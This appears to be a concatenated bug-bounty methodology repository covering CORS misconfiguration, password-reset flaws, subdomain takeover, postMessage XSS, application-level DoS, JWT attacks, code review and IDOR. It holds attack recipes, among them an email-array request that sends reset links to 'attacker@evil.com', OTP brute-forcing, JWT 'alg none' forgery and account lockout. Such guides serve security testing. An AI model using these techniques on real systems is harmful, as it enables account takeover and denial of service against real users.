Misconfigured CORS 2 | Here are few methods and steps you can do to check for misconfigure cors. 3 | 4 | * Hunting method 1(Single target): 5 | 6 | ``` 7 | Step->1. Capture the target website and spider or crawl all the website using burp. 8 | Step->2. Use burp search look for Access-Control 9 | Step->3. Try to add Origin Header i.e,Origin:attacker.com or Origin:null or Origin:attacker.target.com or Origin:target.attacker.com 10 | Step->4 If origin is reflected in response means the target is vuln to CORS 11 | ``` 12 | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------- 13 | 14 | * Hunting method 2(mutliple means including subdomains): 15 | ``` 16 | step 1-> find domains i.e subfinder -d target.com -o domains.txt 17 | step 2-> check alive ones : cat domains.txt | httpx | tee -a alive.txt 18 | step 3-> send each alive domain into burp i.e, cat alive.txt | parallel -j 10 curl --proxy "http://127.0.0.1:8080" -sk 2>/dev/null 19 | step 4-> Repeat hunting method 1 20 | ``` 21 | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------- 22 | 23 | * Both above method are manual methods so lets check an automated way 24 | # Tools 25 | * [https://github.com/chenjj/CORScanner](https://github.com/chenjj/CORScanner) 26 | * [https://github.com/lc/theftfuzzer](https://github.com/lc/theftfuzzer) 27 | * [https://github.com/s0md3v/Corsy](https://github.com/s0md3v/Corsy) 28 | * [https://github.com/Shivangx01b/CorsMe](https://github.com/Shivangx01b/CorsMe) 29 | 30 | # Automate Way : 31 | ``` 32 | step1-> find domains i.e, subfinder -d domain.com -o target.txt 33 | step2-> grep alive: cat target.txt | httpx | tee -a alive.txt 34 | step3-> grep all urls using waybackurls by @tomnomnom and gau tool i.e,cat alive.txt | gau | tee -a urls.txt 35 | step4-> run any of these tools on each url 36 | step5-> configure the manually 37 | ``` 38 | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- 39 | 40 | # Another Method 41 | 42 | ### Tools You Will Need for this method. 43 | * [https://github.com/tomnomnom/meg](https://github.com/tomnomnom/meg) 44 | * [https://github.com/tomnomnom/gf](https://github.com/tomnomnom/gf) 45 | * [https://github.com/projectdiscovery/subfinder](https://github.com/projectdiscovery/subfinder) 46 | * [https://github.com/tomnomnom/assetfinder](https://github.com/tomnomnom/assetfinder) 47 | * [https://github.com/Edu4rdSHL/findomain](https://github.com/Edu4rdSHL/findomain) 48 | * [https://github.com/projectdiscovery/httpx](https://github.com/projectdiscovery/httpx) 49 | 50 | ### Steps 51 | ``` 52 | 1) Find Domains with the help of subfinder,assetfinder,findomain i.e , subfinder -d target.com | tee -a hosts1 , findomain -t target.com | tee -a hosts1 , assetfinder --subs-only target.com |tee -a hosts1 . 53 | 2) Then cat hosts1 | sort -u | tee -a hosts2 and then cat hosts2 | httpx | tee -a hosts . 54 | 3) Navigate through terminal where hosts file is located echo "/" > paths 55 | 4) Then type meg -v 56 | 5) After the completion of process type gf cors. 57 | 6) All the urls with Access-Control-Allow will be displayed. 58 | ``` 59 | 60 | # Authors 61 | * [@Virdoex_hunter](https://twitter.com/Virdoex_hunter) 62 | -------------------------------------------------------------------------------- /CODE_OF_CONDUCT.md: -------------------------------------------------------------------------------- 1 | # Contributor Covenant Code of Conduct 2 | 3 | ## Our Pledge 4 | 5 | In the interest of fostering an open and welcoming environment, we as 6 | contributors and maintainers pledge to making participation in our project and 7 | our community a harassment-free experience for everyone, regardless of age, body 8 | size, disability, ethnicity, sex characteristics, gender identity and expression, 9 | level of experience, education, socio-economic status, nationality, personal 10 | appearance, race, religion, or sexual identity and orientation. 11 | 12 | ## Our Standards 13 | 14 | Examples of behavior that contributes to creating a positive environment 15 | include: 16 | 17 | * Using welcoming and inclusive language 18 | * Being respectful of differing viewpoints and experiences 19 | * Gracefully accepting constructive criticism 20 | * Focusing on what is best for the community 21 | * Showing empathy towards other community members 22 | 23 | Examples of unacceptable behavior by participants include: 24 | 25 | * The use of sexualized language or imagery and unwelcome sexual attention or 26 | advances 27 | * Trolling, insulting/derogatory comments, and personal or political attacks 28 | * Public or private harassment 29 | * Publishing others' private information, such as a physical or electronic 30 | address, without explicit permission 31 | * Other conduct which could reasonably be considered inappropriate in a 32 | professional setting 33 | 34 | ## Our Responsibilities 35 | 36 | Project maintainers are responsible for clarifying the standards of acceptable 37 | behavior and are expected to take appropriate and fair corrective action in 38 | response to any instances of unacceptable behavior. 39 | 40 | Project maintainers have the right and responsibility to remove, edit, or 41 | reject comments, commits, code, wiki edits, issues, and other contributions 42 | that are not aligned to this Code of Conduct, or to ban temporarily or 43 | permanently any contributor for other behaviors that they deem inappropriate, 44 | threatening, offensive, or harmful. 45 | 46 | ## Scope 47 | 48 | This Code of Conduct applies both within project spaces and in public spaces 49 | when an individual is representing the project or its community. Examples of 50 | representing a project or community include using an official project e-mail 51 | address, posting via an official social media account, or acting as an appointed 52 | representative at an online or offline event. Representation of a project may be 53 | further defined and clarified by project maintainers. 54 | 55 | ## Enforcement 56 | 57 | Instances of abusive, harassing, or otherwise unacceptable behavior may be 58 | reported by contacting the project team at patelkathan22@gmail.com. All 59 | complaints will be reviewed and investigated and will result in a response that 60 | is deemed necessary and appropriate to the circumstances. The project team is 61 | obligated to maintain confidentiality with regard to the reporter of an incident. 62 | Further details of specific enforcement policies may be posted separately. 63 | 64 | Project maintainers who do not follow or enforce the Code of Conduct in good 65 | faith may face temporary or permanent repercussions as determined by other 66 | members of the project's leadership. 67 | 68 | ## Attribution 69 | 70 | This Code of Conduct is adapted from the [Contributor Covenant][homepage], version 1.4, 71 | available at https://www.contributor-covenant.org/version/1/4/code-of-conduct.html 72 | 73 | [homepage]: https://www.contributor-covenant.org 74 | 75 | For answers to common questions about this code of conduct, see 76 | https://www.contributor-covenant.org/faq 77 | -------------------------------------------------------------------------------- /Password_Reset_Functionality/Top_5_Password_Reset_Bugs: -------------------------------------------------------------------------------- 1 | Common security flaws in password reset functionality compiled from twitter, writeups, disclosed reports: 2 | 3 | 4 | 5 | 6 | 1. Password Reset Token Leak Via Referrer 7 | 8 | The HTTP referer is an optional HTTP header field that identifies the address of the webpage which is linked to the resource being requested. 9 | The Referer request header contains the address of the previous web page from which a link to the currently requested page was followed 10 | 11 | Exploitation 12 | Request password reset to your email address 13 | Click on the password reset link 14 | Dont change password 15 | Click any 3rd party websites(eg: Facebook, twitter) 16 | Intercept the request in burpsuite proxy 17 | Check if the referer header is leaking password reset token. 18 | 19 | 20 | 21 | 22 | 2. Sending an array of email addresses instead of a single email address. 23 | 24 | In this attack the The attacker can send a password reset link to an arbitrary email by sending an array of email addresses instead of a single email address and It could lead to full account takeover. 25 | 26 | POST https://example.com/api/v1/password_reset HTTP/1.1 27 | Original Request Body: 28 | {“email_address”:”xyz@gmail.com”} 29 | Modified Request Body: 30 | {“email_address”:[“admin@breadcrumb.com”,”attacker@evil.com”]} 31 | 32 | In this way, the password reset link get send to both victim as well as attacker. And the attacker can use it to gain Full account Takeover. 33 | 34 | 35 | 36 | 37 | 3. Bruteforcing OTP for Reseting Password. 38 | 39 | Now, In case The password reset functionality of application is based on OTP validation. 40 | Many program accepts No rate limit as acceptable risk. So, Bruteforcing OTP is worth trying. 41 | You can reset the password of an account by intercepting the request for OTP validation and bruteforcing the 6 digit number. 42 | Using this, it is possible to change and reset the password of any account, by changing the user data and brute-forcing the reset OTP. 43 | 44 | Exploitation 45 | 1. Start the Burp Suite and Intercept the password reset request 46 | 2. Send to intruder 47 | 3. Use null payload 48 | 49 | 50 | 51 | 52 | 4. Full Account Takeover via Changing Email And Password of any User through API Parameters 53 | Exploitation 54 | 55 | 1. Attacker have to login with their account and Go to the Change password function 56 | 2. Start the Burp Suite and Intercept the request 57 | 3. After intercepting the request sent it to repeater and modify parameters Email and Password 58 | POST /api/changepass 59 | [...] 60 | ("form": {"email":"victim@email.tld","password":"12345678"}) 61 | 62 | 63 | 64 | 5. Response manipulation: Replace Bad Response With Good One 65 | 66 | Look for Request and Response like these 67 | HTTP/1.1 401 Unauthorized 68 | (“message”:”unsuccessful”,”statusCode:403,”errorDescription”:”Unsuccessful”) 69 | 70 | Change Response 71 | HTTP/1.1 200 OK 72 | (“message”:”success”,”statusCode:200,”errorDescription”:”Success”) 73 | 74 | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- 75 | I have written a medium blog on this topic if you want to checkit out : https://sm4rty.medium.com/hunting-for-bugs-in-password-reset-feature-2021-3def1b391bef 76 | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- 77 | 78 | -------------------------------------------------------------------------------- /Subdomain_Takeover/Subdomain_Takeover.md: -------------------------------------------------------------------------------- 1 | # Subdomain Takeover 2 | 3 | ## Basics 4 | 5 | ### DNS 6 | ![DNS](dns.png) 7 | * When a web address is accessed eg. "www.xyz.com", a DNS query is performed across a DNS server with the host name. 8 | * The DNS server takes the hostname and resolves it into a numeric IP address 9 | 10 | ### CNAME 11 | ![CNAME](cname.png) 12 | * An alias of domain name to another domain name 13 | * In the example below, xyz.company.com is a source domain and xyz.cloudservice.com is a canonical domain name. 14 | 15 | 16 | 17 | 18 | 19 | ![Subtakeover_basics](subdomain_takeover.png) 20 | 21 | * Subdomains map themselves to a specific IP, 3rd party services like Azure, AWS, Heroku, Github, Fastly, Shopify, etc. to serve the contents. These subdomains use a CNAME record to another domain [eg. xyz.company.com CNAME xyz.cloudservice.com] 22 | * Now due to whatever reason, the company decides to stop utilizing this service and to save some bucks, the company cancels the subscription of the 3rd party cloud service provider. 23 | * But, the company forgets to update or simply remove the CNAME record in the DNS zone file 24 | * Since the CNAME record is not deleted from company.com DNS zone, anyone who registers xyz.cloudservice.com has full control over xyz.company.com until the DNS record is present. 25 | 26 | ## How to find subdomain takeover ? 27 | 28 | ### 1. Subdomain Enumeration 29 | Use the following tools to enumerate subdomains 30 | * [Assetfinder](https://github.com/tomnomnom/assetfinder) 31 | * [Subfinder](https://github.com/projectdiscovery/subfinder) 32 | * [Findomain](https://github.com/Edu4rdSHL/findomain) 33 | 34 | ### 2. Checking for takeover 35 | The following tools are designed to scan a list of subdomains concurrently and identify ones that are able to be hijacked. 36 | * [Subjack](https://github.com/haccer/subjack) 37 | * [SubOver](https://github.com/Ice3man543/SubOver) 38 | 39 | You can also verify if the subdomain is vulnerable or not by going through common error pages. 40 | ### 3. Hijacking the subdomain 41 | Use the following github repositiory to check if the engine is vulnerable or not and the steps for hijacking a particular engine. 42 | * [https://github.com/EdOverflow/can-i-take-over-xyz](https://github.com/EdOverflow/can-i-take-over-xyz) 43 | 44 | If you cannot find your engine in the above repository, [Google](https://www.google.com) is your friend ! 45 | 46 | # Case : CNAME available to buy 47 | ![CNAME available to buy](cname_buy.png) 48 | * There are cases when the CNAME that a subdomain points to, is available to buy. 49 | * In that case the attacker can directly buy that domain and host his/her content. 50 | 51 | ### References 52 | [How we Hijacked 26+ Subdomains](https://medium.com/@aishwaryakendle/how-we-hijacked-26-subdomains-9c05c94c7049) 53 | 54 | [Subdomain Takeover: Finding Candidates](https://0xpatrik.com/subdomain-takeover-candidates/) 55 | 56 | [Subdomain Takeover: Proof Creation for Bug Bounties](https://0xpatrik.com/takeover-proofs/) 57 | 58 | #### Check out our talk on the same at NULL / OWASP Bangalore meetup, June 2020 59 | [https://www.youtube.com/watch?v=xCunHBH8ZQ4](https://www.youtube.com/watch?v=xCunHBH8ZQ4) 60 | 61 | ### Reports (Hackerone) 62 | 63 | #### Resolved 64 | 65 | - [subdomain takeover at news-static.semrush.com](https://hackerone.com/reports/294201) 66 | - [Subdomain takeover of resources.hackerone.com](https://hackerone.com/reports/863551) 67 | - [Subdomain takeover at info.hacker.one](https://hackerone.com/reports/202767) 68 | - [Bulgaria - Subdomain takeover of mail.starbucks.bg](https://hackerone.com/reports/736863) 69 | - [Remote code execution by hijacking an unclaimed S3 bucket in Rocket.Chat's installation script.](https://hackerone.com/reports/399166) 70 | - [Possible SOP bypass in www.starbucks.com due to insecure crossdomain.xml](https://hackerone.com/reports/244504) 71 | 72 | # Authors: 73 | [@aish_kendle](https://twitter.com/aish_kendle) 74 | 75 | [@thakare_prateek](https://twitter.com/thakare_prateek) 76 | 77 | [@klaus](https://twitter.com/klaus_dev) 78 | -------------------------------------------------------------------------------- /Subdomain_Takeover/Sub_or_top_level_domain_takeover.md: -------------------------------------------------------------------------------- 1 | # Subs or Top level Domain 2 | 3 | - CNAME Record 0r A Record —> Points to third party services 4 | 5 | - Check: 6 | ``` 7 | for take-overs is to query a list of domains and check for any that are either: 8 | 9 | 1. attached to a third party domain or destination via the use of a cname record 10 | 11 | 2.return a 404 not found error. 12 | 13 | example : domain that resolved to a CloudFront domain which gave the following error: "Error the request could not be satisfied, generated by CloudFront (CloudFront)" 14 | ``` 15 | ### Technical Detail 16 | 17 | - This attack vector utilizes DNS entries pointing to Service Providers where the pointed subdomain is currently not in use 18 | - Service providers : 19 | ``` 20 | Heroku, Github, Bitbucket, Squarespace, Shopify, Desk, Teamwork, Unbounce, Helpjuice, HelpScout, Pingdom, Tictail, Campaign Monitor, CargoCollective, [StatusPage.io](http://statuspage.io/) and Tumblr. 21 | ``` 22 | ### Impact 23 | 24 | - Attacker can now build a complete clone of the real site, add a login form, redirect the user, steal credentials (e.g. admin accounts), cookies and/or completely destroy business credibility for your company. 25 | - Another senario: 26 | ``` 27 | 1. A Domain Owner points their * (wildcard) DNS-entry to e.g. Heroku. 28 | 2. They forget to add the wildcard-entry to their Heroku-app. 29 | 3. Attacker can now claim any subdomain they want from the Domain Owner. 30 | 4. A Domain Owner will be unaware of the subdomain being exploited. 31 | ``` 32 | - In the not so rare case, the attacker can also “inherit” the Domain Owner’s Wildcard SSL used inside the Service Provider. 33 | 34 | ### Exploit 35 | 36 | - Claim CloudFront: 37 | ``` 38 | Singup to AWS —> head over CloudFront signup 39 | ``` 40 | ### Remediation 41 | ``` 42 | - Check your DNS-configuration for subdomains pointing to services not in use. 43 | - Set up your external service so it fully listens to your wildcard DNS. In Heroku’s case, this means running the following command in your App: heroku domains:add *.[example.com](http://example.com/) 44 | ``` 45 | ### Reference 46 | - Detectify article :[https://labs.detectify.com/2014/10/21/hostile-subdomain-takeover-using-herokugithubdesk-more/](https://labs.detectify.com/2014/10/21/hostile-subdomain-takeover-using-herokugithubdesk-more/) 47 | - Zsec Blog: [https://blog.zsec.uk/subdomainhijack/](https://blog.zsec.uk/subdomainhijack/) 48 | 49 | ### POC 50 | ``` 51 | - I found a website, for now call it [www.target.com](http://www.target.com) 52 | - I went to terminal and run a host command on that target 53 | 54 | host www.target.com 55 | 56 | - it was pointing its 'A' record to 23.227.38.65 this IP 57 | - Now i knew that this IP belongs to shopify cause i had setup a shop on shopify few days back (you can also go and check with whois record for this ip) 58 | - I opened the website [www.target.com](http://www.target.com) , I found there shopify template stating "only one step left to finish setting" (In some cases : it also state Sorry this shop is unavailable) 59 | - Now i knew what i have to do, i sing-up on shopify with trial account, after that i put the same target website name, it gave me error stating application name already exist, so put target.com as a name, finally it was created. 60 | - I went to setting, it shows me two option "connect your domain automatically" and "connect you domain manually" 61 | - I choose first one automatic one, just put that domain [www.target.com](http://www.target.com) , it got connected. We are done, now we owns this top level domain. 62 | ``` 63 | ### Analysis 64 | ``` 65 | - The person registered this domain name from godaddy , and configured its DNS record pointing to shopify IP 66 | - Either he might had forgotten to create a shop or he had created a shop used it for a while then deleted that shop from shopify but didn't removed the DNS entry pointing to shopify's IP 67 | ``` 68 | 69 | ** Pardon for any spelling or grammar mistake ** 70 | 71 | ### Author: 72 | - Twitter Id: @Zero0x00 73 | -------------------------------------------------------------------------------- /XSS/post_message_xss.md: -------------------------------------------------------------------------------- 1 | # **PostMessage XSS (Cross-Site Scripting) Vulnerability** 2 | 3 | ## **Introduction** 4 | The `postMessage` API is widely used in modern web applications to enable cross-origin communication between different windows, iframes, and pop-ups. However, **if the receiving application does not properly validate the origin of incoming messages**, it may be vulnerable to **PostMessage XSS**. 5 | 6 | This vulnerability allows attackers to send malicious data from an **untrusted source (e.g., sandboxed iframe, null origin, or malicious website)** to a trusted application, leading to **security risks such as data theft, session hijacking, and arbitrary JavaScript execution.** 7 | 8 | --- 9 | 10 | ## **How PostMessage Works** 11 | The `window.postMessage()` function allows scripts running in one window to send messages to another window. The syntax is: 12 | 13 | ```javascript 14 | window.postMessage(message, targetOrigin, [transfer]); 15 | ``` 16 | 17 | - `message`: The data to be sent to the target window. 18 | - `targetOrigin`: A string specifying the expected origin of the recipient (use `"*"` to allow any origin, which is insecure). 19 | - `transfer`: Optional, used for passing objects. 20 | 21 | Example of secure usage: 22 | ```javascript 23 | window.postMessage("data", "https://trusted-site.com"); 24 | ``` 25 | 26 | --- 27 | 28 | ## **Vulnerability: Improper Origin Validation** 29 | If an application listens for `postMessage` events **without verifying the sender’s origin**, an attacker can exploit this by crafting a malicious message from an unauthorized source. 30 | 31 | ### **Example of an Insecure Implementation** 32 | ```javascript 33 | window.addEventListener("message", function (event) { 34 | // No origin validation 35 | document.body.innerHTML = event.data; 36 | }); 37 | ``` 38 | **Security Issue:** 39 | - The application directly processes any received message without verifying the sender's origin. 40 | - If an attacker sends a malicious payload (e.g., JavaScript injection), it can lead to XSS. 41 | 42 | ### **Exploitation Scenario** 43 | 1. The vulnerable website listens for messages using `postMessage`, but **does not check the sender’s origin**. 44 | 2. An attacker hosts a malicious page and sends a **crafted message** to the vulnerable application. 45 | 3. The malicious script gets executed inside the vulnerable website, leading to **DOM-based XSS**. 46 | 47 | --- 48 | 49 | ## **Exploiting PostMessage XSS** 50 | 51 | ### **Proof of Concept (PoC)** 52 | The following PoC demonstrates how an attacker can inject malicious JavaScript into a vulnerable application by exploiting a poorly validated `postMessage` request. 53 | 54 | ```html 55 | 56 | 57 | 58 | 59 | PostMessage XSS PoC 60 | 66 | 67 | 68 | Click to Exploit 69 | 70 | 71 | 72 | ``` 73 | 74 | ### **Breakdown of the Attack** 75 | - The script opens the target **vulnerable website** in a new window (`window.open()`). 76 | - It **sends a malicious payload** via `postMessage()` that contains an XSS injection. 77 | - If the application **does not validate the message origin**, the payload executes, triggering **arbitrary JavaScript execution**. 78 | 79 | --- 80 | 81 | ## **Impact of PostMessage XSS** 82 | An attacker exploiting this vulnerability can: 83 | - **Execute malicious JavaScript** on the vulnerable application. 84 | - **Steal sensitive data** such as session tokens, authentication credentials, or user inputs. 85 | - **Modify page content** or inject phishing links. 86 | - **Bypass Same-Origin Policy (SOP)** by controlling a trusted domain’s behavior. 87 | - **Perform clickjacking attacks** by embedding the site in an iframe. 88 | 89 | --- 90 | *Enhanced and reformatted for HowToHunt repository by [remonsec](https://x.com/remonsec)* 91 | -------------------------------------------------------------------------------- /Application_Level_DoS/ALD_Methods.md: -------------------------------------------------------------------------------- 1 | 2 | ## 1. Email Bounce Issues 3 | - Check if Application has Invite Functionality 4 | - Try sending Invites to Invalid Email Accounts 5 | - Try to find Email Service Provider such as AWS SES , Hubspot , Campaign Monitor 6 | **Note: You can find Email Service Provider by checking Email Headers** 7 | * Once you have the Email Service Provider, Check there Hard Bounce Limits. Here are the limits for some of them: 8 | 9 | **1. Hubspot Hard bounces:** HubSpot's hard bounce limit is 5%. For reference, many ISPs prefer bounce rates to be under 2%. 10 | 11 | **2. AWS SES:** The rate of SES ranges from first 2-5% then 5-10% 12 | 13 | ***Impact: Once the Hard Bounce Limits are reached, Email Service Provider will block the Company which means, No Emails would be sent to the Users !*** 14 | 15 | ## 2. Long Password DoS Attack 16 | 17 | - As the value of password is hashed and then stored in Databases. If there is no limit on the length of the Password, it can lead to consumption of resources for Hashing the Long Password. 18 | 19 | **How to test?** 20 | 21 | - Use a Password of length around 150-200 words to check the presense of Length Restriction 22 | - If there is no Restriction, Choose a longer password and keep a eye on Response Time 23 | - Check if the Application Crashes for few seconds 24 | 25 | **Where to test?** 26 | 27 | - Registration Password Field is usually restricted but the Length of Password on the Forgot Password Page and the Change Password (As Authenticated User) Functionality is usually missing. 28 | 29 | 30 | ## 3. Long String DOS 31 | 32 | * When you set some string so long so server cannot process it anymore it cause DOS sometime 33 | 34 | **How to test** 35 | ``` 36 | Create app and put field like username or address or even profile picture name parameter ( second refrence ) like 1000 character of string . 37 | Search A's account from B's account either it will 38 | ``` 39 | - Either it will keeping on searching for long time 40 | - Either the application will crash (500 - Error Code) 41 | 42 | 43 | ## Use Password From Password.txt 44 | ⚠️`it's not recommended using more than 5000 characters as password.` 45 | - Here is the [Password.txt](https://raw.githubusercontent.com/KathanP19/HowToHunt/master/Application_Level_DoS/Password.txt) 46 | 47 | ## 4. Permanent DOS to victim 48 | This is not Application Level DOS but a Permanent DOS to victim. 49 | In some website user get blocked after trying to loging in with wrong credidentials.We will untilize this feature as bug :D. 50 | 51 | **How to check**. 52 | - Go to login page of example.com. 53 | - Now enter valid account email and wrong password . 54 | - Try to login with these details for few times(at least 10-20 times).You can use repeater or intruder in burpsuite. 55 | - If your account get blocked, check the blocking time period.If the blocking time period is more than 30 min .You can report it. 56 | 57 | **Point to Remember** 58 | - Make sure there is no captcha during login because we cann't make any automated tool to loop the request. 59 | - Make sure Old session are expired after being blocked. 60 | 61 | **What is priority of this bug?** 62 | - If the user get permanently block after some wrong attempts this is considered as P2. 63 | - If the user get temporarly block this is considered as P3/P4. 64 | 65 | During report try to add impact by saying that you can permanently block user account by looping this request with some intervals. 66 | 67 | 68 | ## Reference : 69 | \- Email Bounce Issues 70 | * [https://medium.com/bugbountywriteup/an-unexpected-bounty-email-bounce-issues-b9f24a35eb68](https://medium.com/bugbountywriteup/an-unexpected-bounty-email-bounce-issues-b9f24a35eb68) 71 | 72 | \- Long Password DoS Attack 73 | 74 | - https://www.acunetix.com/vulnerabilities/web/long-password-denial-of-service/ 75 | - https://hackerone.com/reports/738569 76 | - https://hackerone.com/reports/167351 77 | 78 | \- Long String DOS 79 | - [https://medium.com/@shahjerry33/long-string-dos-6ba8ceab3aa0](https://medium.com/@shahjerry33/long-string-dos-6ba8ceab3aa0) 80 | - https://hackerone.com/reports/764434 81 | 82 | \- Permanent DOS to victim 83 | - https://youtu.be/5drIMXCQuNw 84 | 85 | ## Author: 86 | * [Keshav Malik](https://twitter.com/g0t_rOoT_) 87 | * [Fani Malik](https://twitter.com/fanimalikhack) 88 | 89 | -------------------------------------------------------------------------------- /JWT/OLD_JWT_ATTACK_Notes.md: -------------------------------------------------------------------------------- 1 | # JWT Attack 2 | 3 | ### FIRST IF YOU DON'T KNOW WHAT IS JWT YOU MUST READ AND WATCH BELOW RESOURCES 4 | ----------------------------------------------------------------------- 5 | * https://twitter.com/BHinfoSecurity/status/1299743624553549825?s=09 6 | * https://youtu.be/ghfmx4pr1Qg ( very begginer friendly) 7 | * https://medium.com/ag-grid/a-plain-english-introduction-to-json-web-tokens-jwt-what-it-is-and-what-it-isnt-8076ca679843 8 | * https://medium.com/swlh/hacking-json-web-tokens-jwts-9122efe91e4a 9 | * https://anubhav-singh.medium.com/get-a-feel-of-jwt-json-web-token-8ee9c16ce5ce 10 | * https://anubhav-singh.medium.com/attacks-on-json-web-token-jwt-278a49a1ad2e 11 | * Cheat Sheet - [Pentester's Lab](https://assets.pentesterlab.com/jwt_security_cheatsheet/jwt_security_cheatsheet.pdf) 12 | 13 | ### NOTES FOR ATTACKING JWT 14 | * What the heck is this ?! 15 | ``` 16 | 1. It is an authentication type 17 | 2. It consists of header,payload,Signature 18 | ``` 19 | --------------------------------------------------------------------------------- 20 | * Header 21 | ``` 22 | { 23 | "alg" : "HS256", 24 | "typ" : "JWT" 25 | } 26 | ``` 27 | ------------------------------------------------------------------- 28 | * Payload 29 | ``` 30 | { 31 | "loggedInAs" : "admin", 32 | "iat" : 1422779638 33 | } 34 | ``` 35 | ----------------------------------------------------------------------------- 36 | * Signature 37 | ``` 38 | HMAC-SHA256 39 | ( 40 | secret, 41 | base64urlEncoding(header) + '.' + 42 | base64urlEncoding(payload) 43 | ) 44 | ``` 45 | ----------------------------------------------- 46 | * Changing alg to null 47 | * Example 48 | ``` 49 | { 50 | "alg" : "NONE", 51 | "typ" : "JWT" 52 | } 53 | Note;;////--remove the signuature 54 | You can also use none,nOne,None,n0Ne 55 | ``` 56 | ------------- 57 | * Change the payload like 58 | ``` 59 | Payload 60 | 61 | { 62 | "loggedInAs" : "admin", 63 | "iat" : 1422779638 64 | } 65 | ``` 66 | * Here change user to admin 67 | ---------------------------------------------------- 68 | # SOME MORE TIPS AND METHOD 69 | -------------------------------------------------------- 70 | 1. First decode full token or 1 1 each part of token to base64 71 | 2. Change the payload use jwt web token burp 72 | 3. Changing encrption RS256 to HS256 73 | 4. Signature not changes remove it or temper it, 74 | 5. Brute forcing the key in hs256 because it use same key to sign and verify means publickey=private key 75 | --------------------------------------------------------------------------------------------------- 76 | ### Other Easy Method 77 | ``` 78 | 1) Create a account 79 | 2) Inspect the token 80 | 3) Base64 decode the header 81 | 4) If any Kid= parameter are there so you can find some bugs 82 | 5) Using that parameter you can also find directory traversal , i tell you how 83 | 6) Change that kid= parameter with you directory traversal payload 84 | 7) Change payload {"user":"admin"} 85 | 8) Create a python script that generate a exploit token. (If you want that script so dm me in Twitter ) 86 | 9) Put that token and reload the page 87 | 10) Done 88 | ``` 89 | --- 90 | # TOOLS TO USE 91 | ----------------------------------------------------------------------------------------------- 92 | * [Jwt token attack burp extention](https://github.com/portswigger/json-web-token-attacker) 93 | * Base64 decoder 94 | * jwt.io to analyse the struct of token 95 | * jwt cat for weak secret token [jwtcat](https://github.com/aress31/jwtcat) 96 | * Tool is used for validating, forging, scanning and tampering JWTs [jwt_tool](https://github.com/ticarpi/jwt_tool) 97 | * Tool to test security of JSON Web Tokens [jwtXploiter](https://github.com/DontPanicO/jwtXploiter) 98 | 99 | --------------------------------------------------------------------------------------------------------------------------- 100 | ### SOURCES: 101 | - Intresting blog - [Medium](https://barrymalone.medium.com/json-web-tokens-beginner-exploitation-5a44f8f6efff) 102 | * Youtube,Medium,Github,Google 103 | ### Author 104 | * [Naman Shah](https://twitter.com/naman_1910) 105 | * [@kAshhadali10](https://twitter.com/kAshhadali10) 106 | * [@0xrtt](https://twitter.com/0xrtt) 107 | * [Anubhav Singh](https://twitter.com/AnubhavSingh_) 108 | -------------------------------------------------------------------------------- /Web_Source_Review/codereviewtips.md: -------------------------------------------------------------------------------- 1 | # Code review:- 2 | 3 | by performing source code review we can find some web application vulnerabilities 4 | 5 | 6 | ### 1.Important functions first 7 | ------------------------------------ 8 | When reading source code, 9 | focus on important functions such as authentication, password reset, state-changing actions and sensitive info reads. 10 | (What is the most important would depend on the application.) 11 | Then, review how these components interact with other functionality. 12 | Finally, audit other less sensitive parts of the application. 13 | 14 | ### 2.Follow user input 15 | ------------------------------ 16 | 17 | Another approach is to follow the code that processes user input. 18 | User input such as HTTP request parameters, HTTP headers, HTTP request paths, database entries, file reads, and 19 | file uploads provide the entry points for attackers to exploit the application’s vulnerabilities.This may also help us to 20 | find some critical vulnerabilities like xxe,xxs,sql injection 21 | 22 | ### 3.Hardcoded secrets and credentials: 23 | ------------------------------------------------------- 24 | Hardcoded secrets such as API keys, encryption keys and database passwords can be easily discovered during a 25 | source code review. You can grep for keywords such as “key”, “secret”, “password”, “encrypt” or regex search 26 | for hex or base64 strings (depending on the key format in use). 27 | 28 | ### 4.Use of dangerous functions and outdated dependencies: 29 | ---------------------------------------------------------------------------------- 30 | Unchecked use of dangerous functions and outdated dependencies are a huge source of bugs. 31 | Grep for specific functions for the language you are using and search through the dependency versions list to 32 | see if they are outdated. 33 | 34 | ### 5.Developer comments, hidden debug functionalities, configuration files, and the .git directory: 35 | ----------------------------------------------------------------------------------------------------------------------- 36 | These are things that developers often forget about and they leave the application in a dangerous state. 37 | Developer comments can point out obvious programming mistakes, hidden debug functionalities often lead to 38 | privilege escalation, config files allow attackers to gather more information about your infrastructure and finally, 39 | an exposed .git directory allows attackers to reconstruct your source code. 40 | 41 | ### 6.Hidden paths, deprecated endpoints, and endpoints in development: 42 | ----------------------------------------------------------------------------------------------------- 43 | These are endpoints that users might not encounter when using the application normally. But if they work and 44 | they are discovered by an attacker, it can lead to vulnerabilities such as authentication bypass and sensitive 45 | information leak, depending on the exposed endpoint. 46 | 47 | 48 | 49 | ### 7.Weak cryptography or hashing algorithms: 50 | ----------------------------------------------------------------------------------------------------------------------- 51 | This is an issue that is hard to find during a black-box test, but easy to spot when reviewing source code. 52 | Look for issues such as weak encryption keys, breakable encryption algorithms, and weak hashing algorithms. 53 | Grep for terms like ECB, MD4, and MD5. 54 | 55 | ### 8.Missing security checks on user input and regex strength: 56 | ----------------------------------------------------------------------------------------------------- 57 | Reviewing source code is a great way to find out what kind of security checks are missing. 58 | Read through the application’s documentation and test all the edge cases that you can think of. 59 | A great resource for what kind of edge cases that you should consider is PayloadsAllTheThings.(github) 60 | 61 | ### 9.Missing cookie flags: 62 | ----------------------------------------------------------------- 63 | Look out for missing cookie flags such as httpOnly and secure. 64 | 65 | 66 | ### 10.Unexpected behavior, conditionals, unnecessarily complex and verbose functions: 67 | -------------------------------------------------------------------------------------------------------------------- 68 | Additionally, pay special attention to the application’s unexpected behavior, conditionals, and complex functions. 69 | These locations are where obscure bugs are often discovered. 70 | 71 | ### Authors 72 | * [@harsha0x01](https://twitter.com/harsha0x01) 73 | -------------------------------------------------------------------------------- /IDOR/IDOR-Old.md: -------------------------------------------------------------------------------- 1 | ## Testing for IDOR/Broken object level authorization: 2 | 3 | Difficulty: Easy 4 | 5 | Tips: Don't blindly test for changing numbers till you get PII, tools can do this for you 6 | 7 | **Finding IDOR Attack Vectors Ideas:** 8 | 9 | 1. What do they use for authorization?(JWT, API Keys, cookies, tokens) Tip: Find this out by replacing high privaledge authorization with lower privaledge authorization and seeing what the server responds with 10 | 2. Understand how they use ID's, hashes, and their API. Do this by looking at the API Documentations if they have one. 11 | 12 | ***Every time you see a new API endpoint that receives an object ID from the client, ask yourself the 